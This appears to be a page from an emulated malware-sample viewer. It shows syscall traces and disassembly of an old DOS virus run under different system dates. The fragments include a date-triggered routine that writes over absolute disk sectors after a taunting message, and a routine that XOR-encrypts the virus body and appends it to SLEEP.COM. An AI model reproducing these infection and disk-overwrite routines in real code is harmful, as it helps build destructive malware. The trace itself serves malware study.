Sample viewer

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16843,"SideJobID":0}

.

GIF

Syscalls:

{"DateBased":true,"Day":1,"Month":1,"Year":1993,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16843,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:54:02.032245905Z	61	PC: 12c68 | Open file (Filename = 'TBFILXXX')
2018-12-25T12:54:02.048672198Z	26	PC: 12c44 | Set disk transfer address
2018-12-25T12:54:02.050348257Z	71	PC: 12b38 | Get current directory
2018-12-25T12:54:02.052504432Z	78	PC: 12b48 | Find first file
2018-12-25T12:54:02.056594706Z	42	PC: 12b5d | Get date 0x12b5d: cmp cx, 0x7c9 0x12b61: jb 0x12b8d 0x12b63: cmp al, 5 0x12b65: jne 0x12b8d 0x12b67: mov ah, 9 0x12b69: lea dx, word ptr [bp + 0x172] 0x12b6d: int 0x21 0x12b6f: int 0x20 0x12b71: mov ah, 0x2c 0x12b73: int 0x21 0x12b75: mov cx, dx 0x12b77: mov al, 2 0x12b79: mov dx, 1 0x12b7c: int 0x26 0x12b7e: jb 0x12b83 0x12b80: add sp, 2 0x12b83: inc al 0x12b85: cmp al, 4 0x12b87: je 0x12b8b 0x12b89: jmp 0x12b67
2018-12-25T12:54:02.065724276Z	9	PC: 12b6f | Display string (String= 'Nothing like the smell of napalm in the morning!')

{"DateBased":true,"Day":2,"Month":1,"Year":1993,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16843,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:54:03.747479466Z	61	PC: 12c68 | Open file (Filename = 'TBFILXXX')
2018-12-25T12:54:03.769242852Z	26	PC: 12c44 | Set disk transfer address
2018-12-25T12:54:03.784686622Z	71	PC: 12b38 | Get current directory
2018-12-25T12:54:03.787841999Z	78	PC: 12b48 | Find first file
2018-12-25T12:54:03.794705655Z	42	PC: 12b5d | Get date 0x12b5d: cmp cx, 0x7c9 0x12b61: jb 0x12b8d 0x12b63: cmp al, 5 0x12b65: jne 0x12b8d 0x12b67: mov ah, 9 0x12b69: lea dx, word ptr [bp + 0x172] 0x12b6d: int 0x21 0x12b6f: int 0x20 0x12b71: mov ah, 0x2c 0x12b73: int 0x21 0x12b75: mov cx, dx 0x12b77: mov al, 2 0x12b79: mov dx, 1 0x12b7c: int 0x26 0x12b7e: jb 0x12b83 0x12b80: add sp, 2 0x12b83: inc al 0x12b85: cmp al, 4 0x12b87: je 0x12b8b 0x12b89: jmp 0x12b67
2018-12-25T12:54:03.797945139Z	61	PC: 12b96 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:03.806138454Z	63	PC: 12ba2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:54:03.813636525Z	66	PC: 12c4c | Move file pointer
2018-12-25T12:54:03.816812838Z	64	PC: 12bd4 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:54:03.820311832Z	66	PC: 12c4c | Move file pointer (See above)
2018-12-25T12:54:03.822421619Z	44	PC: 12bdd | Get time 0x12bdd: mov word ptr ds:[bp + 0x30e], dx 0x12be2: call 0x22a83 0x12be5: push bx 0x12be6: push cx 0x12be7: push dx 0x12be8: mov dx, word ptr ds:[bp + 0x30e] 0x12bed: lea bx, word ptr [bp + 0x381] 0x12bf1: mov cx, 0xea 0x12bf4: xor word ptr [bx], dx 0x12bf6: add bx, 2 0x12bf9: loop 0x12bf4 0x12bfb: pop dx 0x12bfc: pop cx 0x12bfd: pop bx 0x12bfe: mov ah, 0x40 0x12c00: mov cx, 0x38 0x12c03: lea dx, word ptr [bp + 0x103] 0x12c07: int 0x21 0x12c09: mov ah, 0x40 0x12c0b: mov cx, 0x1d3
2018-12-25T12:54:03.829050598Z	64	PC: 12c09 | Write file or device (Write 56 bytes on handle 5)
2018-12-25T12:54:03.832408468Z	64	PC: 12c14 | Write file or device (Write 467 bytes on handle 5)
2018-12-25T12:54:03.85335207Z	64	PC: 12c1f | Write file or device (Write 6 bytes on handle 5)
2018-12-25T12:54:03.865924117Z	87	PC: 12c2e | Get or set file date and time
2018-12-25T12:54:03.867875247Z	62	PC: 12c32 | Close file
2018-12-25T12:54:03.877117211Z	59	PC: 12c3d | Change current directory
2018-12-25T12:54:03.882007791Z	26	PC: 12c44 | Set disk transfer address (See above)
2018-12-25T12:54:03.884259679Z	9	PC: 12a47 | Display string (String= 'Stoopid GRUNT-4 Dropper!')